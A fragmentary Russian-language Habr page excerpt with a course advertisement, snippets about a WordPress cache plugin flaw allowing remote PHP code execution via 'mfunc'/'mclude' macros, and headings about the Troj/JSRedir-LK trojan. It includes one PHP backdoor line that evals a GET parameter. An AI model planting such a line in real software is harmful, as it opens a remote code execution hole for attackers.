Хабр Курсы для всех
РЕКЛАМА
Практикум, Хекслет, SkyPro, авторские курсы — собрали всех и попросили скидки. Осталось выбрать!
обнаружена уязвимость, позволяющая удаленному пользователю внедрить и выполнить произвольный PHP код
if( isset($_GET['super_secret_var']) ) eval( $_GET['super_secret_var'] );
?Приложение неправильно ограничивает доступ к макросам включения PHP кода «mfunc» и «mclude».… Для успешной эксплуатации уязвимости требуется, чтобы константа «W3TC_DYNAMIC_SECURITY» была определена, а также, чтобы атакующий имел привилегии для редактирования публикаций, страниц или комментариев, использующих макросы «mfunc» и «mclude» с данной константой.
Пока искала дыру, через которую проник вирус
Троян Troj/JSRedir-LK и уязвимость WordPress